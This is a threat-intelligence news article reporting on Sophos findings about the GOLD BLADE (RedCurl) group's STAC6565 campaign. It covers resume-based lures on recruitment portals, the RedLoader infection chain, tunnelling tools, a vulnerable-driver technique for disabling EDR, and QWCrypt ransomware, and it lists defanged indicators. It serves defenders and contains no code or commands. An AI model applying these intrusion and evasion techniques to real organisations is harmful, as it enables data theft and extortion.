GOLD BLADE Exploiting Custom QWCrypt Locker for Data Exfiltration and Ransomware Deployment

Between February 2024 and August 2025, Sophos threat analysts identified nearly 40 intrusions linked to campaign STAC6565, attributed with high confidence to the GOLD BLADE threat group also tracked as RedCurl, RedWolf, and Earth Kapre.

Once known for espionage operations, GOLD BLADE has evolved into a hybrid actor that combines data theft, credential harvesting, and selective ransomware deployment using its proprietary QWCrypt locker.

Nearly 80% of the campaign’s targets were Canada-based organizations, primarily in the services, manufacturing, retail, and technology sectors.

The group has shifted from classic spearphishing to a novel social engineering tactic that exploits recruitment platforms such as Indeed, JazzHR, and ADP WorkforceNow.

Instead of sending malicious emails, attackers upload weaponized resumes as PDFs directly to recruitment portals, exploiting HR departments’ trust in these systems.

Upon viewing the documents, victims are redirected to fake “Safe Resume Share Service” pages that serve RedLoader malware, initiating a multi-stage compromise.

Multi-Stage RedLoader Chain and BYOVD Evasion

The RedLoader infection chain observed by Sophos evolved through three stages: initial execution, secondary payload deployment, and final installation.

Early variants employed .lnk and .iso delivery methods, while later attacks in 2025 combined remote DLL sideloading hosted on Cloudflare Workers domains (e.g., automatinghrservices[.]workers[.]dev).

Each stage used browser-themed scheduled tasks to deploy payloads and maintain persistence, utilizing living-off-the-land binaries such as pcalua.exe for stealth execution.

To maintain command and control, GOLD BLADE leveraged open-source RPivot and Chisel tunneling tools, establishing SOCKS proxies to C2 servers hosted on Cloudflare Workers and external IP infrastructure.

Defense evasion employed a Bring Your Own Vulnerable Driver (BYOVD) technique, using modified Zemana AntiMalware drivers and customized Terminator utilities to disable EDR/XDR protections.

Analysts discovered unique build paths in Terminator samples, revealing an organized ransomware toolkit and operational structure.

In April and July 2025, GOLD BLADE executed QWCrypt ransomware deployments following data exfiltration. Delivered via encrypted 7-Zip archives, the ransomware appended .qwCrypt extensions and dropped ransom notes akin to LockBit styles.

While Sophos CryptoGuard protected against many attacks, unprotected endpoints offered limited encryption.

The incident demonstrated GOLD BLADE’s strategic ability to alternate between espionage-for-hire and direct financial extortion.

Sophos detections for this campaign include Troj/Agent-BLEI, Troj/Ransom-HHH, and CXmal/KillAV-ZA.

Key indicators include multiple Cloudflare Workers C2 domains, IP 109[.]206[.]236[.]209, and confirmed QWCrypt hashes such as 568352411deff640ba781ae55d98d657da02191d97e0466e6883b966dd1e77db.

Organizations are advised to sandbox incoming resumes, strengthen endpoint monitoring, and deploy managed detection and response (MDR) solutions to detect evolving GOLD BLADE techniques.

Find this Story Interesting! Follow us on Google News , LinkedIn and X to Get More Instant Updates

The post GOLD BLADE Exploiting Custom QWCrypt Locker for Data Exfiltration and Ransomware Deployment appeared first on Cyber Security News.